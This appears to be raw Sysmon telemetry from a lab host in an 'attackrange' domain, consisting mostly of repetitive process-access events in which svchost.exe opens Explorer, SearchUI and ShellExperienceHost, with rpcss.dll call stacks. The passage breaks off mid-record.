13:19:59.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21C6021DED69E3A20CD1A52A4CEBFC55,SHA256=095E62A1D517C27CB7E3223D42915C64E827E8449828B88E6B829DD90D902651,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.589{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.589{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.589{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.589{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.589{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.589{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.589{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.589{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.589{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:00.669{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 